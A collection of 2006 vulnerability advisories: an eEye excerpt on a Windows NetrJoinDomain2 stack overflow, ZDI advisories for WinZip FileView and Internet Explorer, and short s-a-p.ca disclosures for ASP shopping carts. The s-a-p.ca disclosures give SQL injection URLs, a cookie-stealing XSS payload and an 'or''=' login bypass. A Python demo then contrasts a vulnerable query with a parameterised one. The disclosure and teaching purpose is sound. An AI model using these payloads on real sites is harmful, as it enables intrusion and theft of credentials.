    .text:76781D67    mov     edi, [ebp+arg_0]
    ...
    .text:76781D90    lea     eax, [ebp+var_2CC]
    ...
    .text:76781DA0    push    edi
    .text:76781DA1    push    offset "%ws\\IPC$"
    .text:76781DA6    push    eax
    .text:76781DA7    call    ds:swprintf

This function is called by NetpJoinDomain, which is eventually called by the NetrJoinDomain2 function, which is exposed through RPC. The IDL for NetrJoinDomain2 looks like this:

    long [EMAIL PROTECTED] (
        [in][unique][string] wchar_t * arg_1,
        [in][string]         wchar_t * arg_2,
        [in][unique][string] wchar_t * arg_3,
        [in][unique][string] wchar_t * arg_4,
        [in][unique]         struct_C * arg_5,
        [in]                 long arg_6
    );

arg_2 will contain a string with a format like Domain name+\+Hostname. Hostname will be passed as NetpManageIPCConnect's first argument. The variable is under the attacker's control and is passed to swprintf, which causes a stack-based buffer overflow.

For this vulnerable code to be reached, we must provide a valid and live Domain name as a part of the string. We can set up a fake domain server anywhere reachable from the vulnerable machine on the Internet.

P.S. If you despise Birkenstocks, are not afraid of your Tequila, and are well versed in reverse engineering, bug finding, or are looking to learn, we are hiring both junior and senior security researchers. Send your resume (blathering of college course work, degrees, and past experience we don't care about) or more importantly a description of why you would be a good researcher to [EMAIL PROTECTED]

Credit:

Discovery: JeongWook Matt Oh
Additional Research: Derek Soeder

Related Links:

Retina Network Security Scanner - Free Trial
Blink Endpoint Vulnerability Prevention - Free Trial

Greetings:

Dugsong, Ohhara, Ryan Lee, Pilot, Sakai, Gonan and all the Korean Bugtruck Mailing List Subscribers

Copyright (c) 1998-2006 eEye Digital Security

Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email [EMAIL PROTECTED] for permission.

Disclaimer

The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
ZDI-06-040: WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-040.html
November 14, 2006

-- CVE ID:
CVE-2006-5198

-- Affected Vendor:
WinZip

-- Affected Products:
WinZip 10.0 (pre build 7245)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since September 5, 2006 by Digital Vaccine protection filter ID 4671. For further product information on the TippingPoint IPS:
    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on systems with vulnerable installations of WinZip. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific flaw exists within the ActiveX control WZFILEVIEW.FileViewCtrl.61, CLSID:

    A09AE68F-B14D-43ED-B713-BA413F034904

A re-branded version of the FileView ActiveX control developed by Sky Software. The object is marked Safe for Scripting and exposes several unsafe methods which can be leveraged to result in arbitrary code execution with no further interaction.

-- Vendor Response:
WinZip has issued build 7245 to correct this vulnerability. More details can be found at:
    http://www.winzip.com/wz7245.htm

-- Disclosure Timeline:
2006.08.28 - Vulnerability reported to vendor
2006.09.05 - Digital Vaccine released to TippingPoint customers
2006.11.14 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by an anonymous researcher.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
ZDI-06-041: Microsoft Internet Explorer CSS Float Property Memory Corruption Vulnerability
ZDI-06-041: Microsoft Internet Explorer CSS Float Property Memory Corruption Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-041.html
November 14, 2006

-- CVE ID:
CVE-2006-4687

-- Affected Vendor:
Microsoft

-- Affected Products:
Internet Explorer 6

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability since October 10, 2006 by Digital Vaccine protection filter ID 4761. For further product information on the TippingPoint IPS:
http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page.

The specific vulnerability exists due to improper parsing of HTML CSS 'float' properties. By ordering specially crafted 'div' tags in a web page, memory corruption can occur leading to remote code execution.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:
http://www.microsoft.com/technet/security/Bulletin/MS06-067.mspx

-- Disclosure Timeline:
2006.07.18 - Vulnerability reported to vendor
2006.10.10 - Digital Vaccine released to TippingPoint customers
2006.11.14 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Sam Thomas.
A+ Store E-Commerce [injection sql, xss (post)]
vendor site: http://www.webinhabit.com/
product: A+ Store E-Commerce
bug: injection sql, xss (post)
risk: medium

injection sql (get):
http://site.com/browse.asp?ParentID='[sql]

xss (post), in /account_login.asp:
username = </textarea>'<script>alert(document.cookie)</script></textarea>'<script>alert(document.cookie)</script>
passwd = </textarea>'<script>alert(document.cookie)</script></textarea>'<script>alert(document.cookie)</script>

laurent gaffié
benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
A-Cart pro [injection sql (post/get)]
vendor site: http://www.alanward.net/
product: A-Cart pro
bug: injection sql
risk: medium

injection sql (get):
/category.asp?catcode='[sql]
/product.asp?productid='[sql]

injection sql (post):
http://site.com/search.asp
Variables: /search.asp?search='[sql]
(or just post your query in the search engine ...)

laurent gaffié
benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
hpecs shopping cart [login bypass, injection sql (post)]
vendor site: http://hpe.net/
product: hpecs shopping cart
bug: injection sql
risk: high

login bypass:
username: 'or''='
passwd: 'or''='

injection sql (post):
http://site.com/search_list.asp
variables: Hpecs_Find=maingroupsearchstring='[sql]
(or just post your query in the search engine ...)

laurent gaffié
benjamin mossé
http://s-a-p.ca/
contact: [EMAIL PROTECTED]
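The login-bypass payload from the hpecs advisory above, worked through as an added example (not the advisory's or the vendor's code): a login query assembled by string concatenation, the classic-ASP pattern behind all three s-a-p.ca advisories, beside its parameterised replacement, run against a constructed SQLite table whose name, columns and sample account are assumptions for the demo.

```python
"""Added example, not part of the hpecs advisory or the vendor's code.
Shows why the login-bypass payload 'or''=' works against a login query
built by string concatenation and why a parameterised query is immune.
The users table, its column names and the sample account are constructed."""
import sqlite3

BYPASS = "'or''='"  # payload quoted in the hpecs advisory


def make_db() -> sqlite3.Connection:
    """In-memory table with one constructed valid account."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, passwd TEXT)")
    con.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    con.commit()
    return con


def build_vulnerable_sql(username: str, passwd: str) -> str:
    """Vulnerable pattern: user input pasted straight into the WHERE clause.
    With BYPASS in both fields the clause becomes
        username=''or''='' AND passwd=''or''=''
    and the trailing ''='' is true for every row, so any user is returned."""
    return ("SELECT username FROM users WHERE username='" + username
            + "' AND passwd='" + passwd + "'")


def login_vulnerable(con: sqlite3.Connection, username: str, passwd: str) -> bool:
    row = con.execute(build_vulnerable_sql(username, passwd)).fetchone()
    return row is not None


def login_parameterised(con: sqlite3.Connection, username: str, passwd: str) -> bool:
    """Hardened form: placeholders make the quote characters plain data, so
    the payload is compared as a literal username and never matches."""
    row = con.execute(
        "SELECT username FROM users WHERE username=? AND passwd=?",
        (username, passwd),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass payload:   ", login_vulnerable(db, BYPASS, BYPASS))
    print("parameterised, bypass payload:", login_parameterised(db, BYPASS, BYPASS))
    print("parameterised, real account:  ", login_parameterised(db, "alice", "correct-horse"))
```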